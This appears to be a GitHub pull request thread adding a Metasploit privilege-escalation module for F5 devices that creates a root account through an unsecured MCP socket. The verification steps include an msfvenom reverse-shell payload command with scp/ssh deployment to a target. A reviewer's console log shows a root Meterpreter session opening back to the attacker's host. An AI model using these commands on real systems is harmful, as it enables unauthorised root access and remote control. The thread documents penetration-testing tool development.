metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Add a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account

Open rbowes-r7 opened this issue 2 years ago • 3 comments

This adds one final F5 module - a privilege escalation by creating a new user account using the MCP protocol and globally-accessible socket.

Verification

  • [ ] Start msfconsole
  • [ ] Get a non-root session - I use multi/handler + msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf [email protected]:/tmp && ssh [email protected] "sudo -u apache /tmp/testexploit.elf"
  • [ ] Run use exploit/linux/local/f5_create_user
  • [ ] Set SESSION to the ID of the previously created session
  • [ ] run, and get root

The docs/ should be up to date!

rbowes-r7 avatar Dec 15 '22 21:12 rbowes-r7

@msjenkins-r7 test this please.

jmartin-tech avatar Dec 15 '22 23:12 jmartin-tech

Just wanted to say that I haven't forgotten this, but haven't had time to work on it either

rbowes-r7 avatar Jan 20 '23 17:01 rbowes-r7

I believe I corrected all the issues, sorry about the delay!

rbowes-r7 avatar Feb 01 '23 19:02 rbowes-r7

Thanks so much Ron! Changes work great. Awesome module 🚢

msf6 exploit(multi/handler) > use modules/exploit/linux/local/f5_create_user.md
[-] No results from search
[-] Failed to load module: exploit/linux/local/f5_create_user.md
msf6 exploit(multi/handler) > use modules/exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > set session 1
session => 1
msf6 exploit(linux/local/f5_create_user) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/f5_create_user) > set lport 4445
lport => 4445
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.123.1:4445
[*] Will attempt to create user DMi6W0t1 / ZvGNep2BFL23, then change password to 6gsAldAIMSHc when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (24380 bytes) to 192.168.123.216
[*] Meterpreter session 2 opened (192.168.123.1:4445 -> 192.168.123.216:53188) at 2023-02-02 14:01:19 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

jheysel-r7 avatar Feb 02 '23 19:02 jheysel-r7

Release Notes

This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account

jheysel-r7 avatar Feb 02 '23 20:02 jheysel-r7